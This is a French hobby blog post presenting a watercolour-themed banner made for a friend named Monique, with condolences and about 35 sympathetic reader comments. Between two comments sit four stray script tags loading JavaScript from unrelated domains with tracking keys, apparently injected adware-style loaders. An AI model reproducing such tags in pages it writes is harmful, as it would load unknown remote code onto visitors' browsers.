• Ma Bannière pour Monique...

     

     

    Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires...Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires...Il vous faudra être inscrit à mon blog et me déposer régulièrement des commentaires

     

    Ma Bannière pour Monique...

     

     

    J'espère que tout le monde va bien, ici il fait froid et hier soir, le feu dans ma cheminée a crépité.

    Je vous retrouve aujourd'hui pour vous montrer ma Bannière pour Monique qui réalise de très belles aquarelles....

    Sa Demande....

     

    "Alors j aimerais avoir un titre oui «  les aquarelles de Monique avec un fond couleur aquarelle avec des pinceaux ou autre’’ 

     

     

    Ma Bannière pour Monique...

     

     

     

    Cliquez sur la Bannière pour la voir en taille réelle...

     

     

     

    Ma Bannière pour Monique...

     

     

    Le fond est l'identique du fond de la Bannière...

     

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Ma Bannière pour Monique...

     

     

    Voici la signature...

     

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Pour visiter son blog cliquez

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Ma Bannière pour Monique...

     

     

     Hier, je n'ai pas pu toutes vous visiter ou répondre à vos mail... Je vais me rattraper....

     

    J'ai le cœur gros, la Maman du conjoint de ma Fille est décédée brusquement hier.... Je dépose ici une bougie.... en pensant à ses Enfants, Petits-Enfants, son Époux et sa Maman

     

    Pour Toi Christine ♥♥♥

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Ma Bannière pour Monique...

     

     

     

     

    Ma Bannière pour Monique...

     

     

    ( à Retrouver dans la Rubrique "Merci Visite"-"Automne" ICI )

     

     

     

     

    Ma Bannière pour Monique...

     

     

    ( à Retrouver dans la Rubrique "Bisous"-"Automne" ICI )

     

     

     

     

    Ma Bannière pour Monique...

     

     

    ( A Retrouver dans la Rubrique "Jours"-"Lundi"-"Automne" ICI )

     

     

     

     


    Tags Tags : , , , , , ,
  • Commentaires

    35
    Mercredi 30 Septembre 2020 à 22:46

    Ta bannière est superbe et ça semble tellement un exercice facile pour toi...

    Toutes mes condoléances à ton gendre car il doit être bien jeune encore pour perdre sa maman...

    J'espère  que vous aurez retrouvé votre camping car en très bon état.

    Bisous

     

    34
    Mercredi 30 Septembre 2020 à 22:21
    bibikafeine

    superbe ! j'adore cette bannière et son fond d'écran. bravo ! bises

    33
    Mercredi 30 Septembre 2020 à 16:03
    dane

    coucou ma belle cette bannière est tout en douceur de jolies uances brav %Monique doit être contente bisous 

    32
    Mardi 29 Septembre 2020 à 20:43

    Elle est trop belle ta bannière et toute en douceur bravo

    De tout coeur avec vous en ces moments difficiles

    Gros bisous Pierrette67

    31
    Mardi 29 Septembre 2020 à 20:30

    Bonne et douce soirée ma chère Valie

    malgré cette perte douloureuse

    Gros bisous 

    Janine

    30
    Mardi 29 Septembre 2020 à 10:06

    ta bannière est superbe tres douce et tres femme

    Toutes mes condoléances a toutes ta famille

    bisous

    29
    Lundi 28 Septembre 2020 à 23:58

    Douces pensées à vous tous ma tite Valie, comme c'est triste !!

    Très bel ensemble réalisé pour ton Amie Monique, Bravo ma Douce, quelle créativité !!

    Mille Bisous affectueux.

    28
    Lundi 28 Septembre 2020 à 22:10

    C'est https://i.postimg.cc/x1gRMf1Z/femme-clipart-superbe-evy.gif comme toujours chère Valie.  Et désolée pour ta famille de cette grande perte.

    27
    Lundi 28 Septembre 2020 à 21:33

    Condoléances à la belle famille de ta fille .

    Une magnifique bannière pour ton amie ,bravo ma belle bisous du soir .

    26
    marianne pirotte
    Lundi 28 Septembre 2020 à 20:28

    Toutes mes sincères condoléances à toute la famille !!

    La bannière est de toute beauté comme tu sais si bien les faire

    Gros bisous

    Marianne

    25
    Lundi 28 Septembre 2020 à 19:36

    Bonsoir ma douce Valie

    Tu as fait encore une heureuse ton amie Monique avec ta superbe bannière ! son blog est très beau !

    Toute mes condoléances pour ta fille et sa famille et bien sûre pour toi aussi ! en pensées avec vous

    J'espère que tu vas bien et je te souhaite une bonne soirée  gros bisous

    Janine

    24
    Lundi 28 Septembre 2020 à 18:55

    Sincères condoléances à vous tous, car c'est votre famille entière qui est touchée par cette disparition? Bon courage à ta fille et son conjoint qui doivent être bien triste. 

    Jolie ta bannière pour Monique de belles couleurs lumineuses

    Bravo

    Bisous

    23
    Jacline-H-49
    Lundi 28 Septembre 2020 à 17:29

    Sincères condoléances, c'est trop triste pour toute la famille, à qui je souhaite bon courage. 

    ça vient ternir votre anniversaire de mariage de ce jour, pour lequel je souhaite quand même encore beaucoup d'amour entre vous, toi et Patrick. Et que je puisse vous le fêter longtemps.

    Ceci dit, jolie bannière toute en douceur. Joli travail ma Valie, bravo !

    Bonne fin de journée

    GROS BISOUS TENDRESSE de 

    Jacline 

     

    22
    Lundi 28 Septembre 2020 à 16:56

    Allô ma belle Valie, un gros bravo pour cette magnifique bannière aux couleurs douces. Passe une belle fin de journée, bisou rose tendresse !

    21
    Jour de Mai
    Lundi 28 Septembre 2020 à 15:48

    Coucou Valie, 

    Après une matinée bien chargée, je passe sur ton blog pour déjà te dire Bravo pour cette nouvelle bannière, j'adore, elle est magnifique et en adéquation avec le blog de Monique qui fait de jolies aquarelles. Bravo à elle aussi. 

    Par contre je suis triste pour le conjoint de ta fille ainée, un décès subit dont on cherche toujours l'explication et sans doute jeune encore même si on est toujours trop jeune pour passer sur l'autre rive. Je compatis à votre douleur, toutes mes pensées pour ce moment difficile que vous traversez. 

    Cette journée anniversaire aura été pour vous teintée de gris. 

    Je passe sur le bonne semaine mais vous souhaite malgré tout une belle fin d'après-midi, grise aussi, ce matin il faisait meilleur. 

    Gros bisous d'amitié ♥♥♥

    LN

    20
    Jeannine (cristal24)
    Lundi 28 Septembre 2020 à 15:36

    Encore une très belle bannière à ton actif.

    Je viens d'aller faire un tour sur le blog de Monique, c'est très beau ce qu'elle fait.....tout comme sa soeur.

    Bon courage à toute la famille du côté de ta fille et de son conjoint.  La vie n'est pas toujours comme on aimerait qu'elle soit; et c'est bien triste.

    Bises.

    Jeannine

     

    19
    Lundi 28 Septembre 2020 à 14:21

    encore une magnifique bannière à ton actif ! bravo ! j'adore 

    et un très joli blog à visiter !

    gros bisous

    18
    Lundi 28 Septembre 2020 à 14:10

    Bonjour Valie

    Encore un grand merci pour ta Bannière qui plait énormément en lisant les commentaires !  Et merci à toi de me citer sur ton blog , pour moi c est un véritable honneur ! 

    Depuis j ai plus de visites et de gentils commentaires qui font beaucoup plaisir 

    je suis de tout cœur avec toi dans les difficiles moments que vous passez !! La vie ne nous épargne pas et j ai malheureusement perdue beaucoup de mes proches , donc je compatis à votre douleur

    A très bientôt  

    17
    Lundi 28 Septembre 2020 à 12:51

    Superbe la bannière pour ton amie et la tienne est très jolie également.


    La vie n'est pas un long fleuve tranquille . . .

    Bonne semaine.
    Bisous.

    16
    Lundi 28 Septembre 2020 à 11:41

    Je galère à déposer mes comms chez toi ! :(
    Quelle triste nouvelle !! Pensées pour ta fille et son Ami !! Plein de courage à leur famille.

    Bravo pour ta jolie création !
    Gros Bisous

    15
    Lundi 28 Septembre 2020 à 11:32

    Du très joli travail épuré et Magnifique...bravo Valie...Merci de nous offrir le privilège de voir et de visiter une bien belle Adresse.

    Oh!...encore un grand départ pour la route de 

    Lumière ...Oui je comprends votre tristesse à Tous.

    Courage a cette Famille qui doit être dans la peine.

    Courage  à Toi ma Douce,je sais que ton Coeur 

    pleure aussi.A bientôt*

    Gros bisous*

     

    14
    Lundi 28 Septembre 2020 à 10:20

    Très belle ta bannière pour ton amie!! J'aime beaucoup et bravo à toi.....

    Bisous et douce journée

    13
    mamijojo77100
    Lundi 28 Septembre 2020 à 09:55

    tres jolie banniere toute douce, joli travail.ettoutes mes condoleances pour vous tous de pres ou de loin, subitement c est ce qu il y a de pire!!  et jeune encore je suppose.. GBISOUS  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1601279604523" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    12
    Lundi 28 Septembre 2020 à 09:36
    lamanuelle25

    Pleine de douceur cette bannière! Bises Nadine

    11
    Lundi 28 Septembre 2020 à 09:09
    Encore une réussite à ton actif
    Quelle tristesse toutes mes condoléances valie
    Gros bisous
    10
    Lundi 28 Septembre 2020 à 09:04

    Du beau travail comme à ton habitude.

    Plein de bisous réconfortants pour toi et les tiens dans cette épreuve douloureuse.

    Nicole

    9
    Gaelle
    Lundi 28 Septembre 2020 à 09:04
    Nous n'avons pas encore allumé le poêle mais ici aussi il fait froid et cela ne va pas tarder.
    Une maman qui s'en va, c'est toujours très difficile.....
    Encore une belle création de bannière.
    Bravo a toi
    Biz
    Gaelle
    8
    Lundi 28 Septembre 2020 à 09:02

     Waouhh!!!!! elle  est   superbe  cette  bannière   quelle  douceur     bravo  !!!!!

      gros  bisous

    L’email a bien été copié
    <textarea id="cliquemailclipboardAreaToText"></textarea>
    7
    Lundi 28 Septembre 2020 à 08:20
    Une belle création Une pensée pour vous. Bonne journée. Gros bisous
    6
    Lundi 28 Septembre 2020 à 08:00

    Une bien jolie bannière pour ton amie et des pensées pour cette famille endeuillée. Bon lundi et bonne semaine Valie. Bises et amitié.

    5
    Lundi 28 Septembre 2020 à 07:41

    Une très jolie bannière comme toujours ;-) J'aime beaucoup ce fond de couleurs. 
    Bon courage à toi et ta famille pour la perte à laquelle vous êtes confrontée. 

    Bises

    Thaly

    4
    Lundi 28 Septembre 2020 à 07:40

    Bonjour ma Valie, tu as réalisé une splendide bannière pour ton amie Monique qui fait elle même de très belle aquarelle !!!

    Je suis vraiment triste pour le compagnon de ta fille mes pensées sont avec lui et sa famille

    Passe une bonne semaine

    Bisous de Pat

    3
    Lundi 28 Septembre 2020 à 07:39

    hello Valie 

    la bannière est magnifique , j'adore 

    je présente aussi mes sincères condoléances à la famille de ta fille ainsi qu'à elle !! encore une moment très difficile à passer 

    bonne journée 

    bisous

    2
    Lundi 28 Septembre 2020 à 07:11

    Magnifique ta bannière pour Monique !

    Une pensée pour tous ceux et celles qui sont dans la douleur de la perte d'un être cher.

    Bisous à toutes.

    1
    Lundi 28 Septembre 2020 à 06:58

    Tout est devenu tristesse dans cette vie, hier j ai écouté l interwiev de Fabrice Lucchini que j admire et bien la justesse de ses paroles sur l avenir était pertinent , il a montré une certaine peur entre les lignes tout en restant sobre sur ce monde fou et violent à en devenir, condoléances pour toi et ta fille ma douce, c est bien triste de disparaitre si vite, je pense à vous très fort

    En attendant je suis allée voir le blog de ton amie elle fait des choses superbes , et ta bannière va bien avec son blog , j admire tout en pureté et élégance

    Bisous ma douce, je passe sur le bon début de semaine 

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :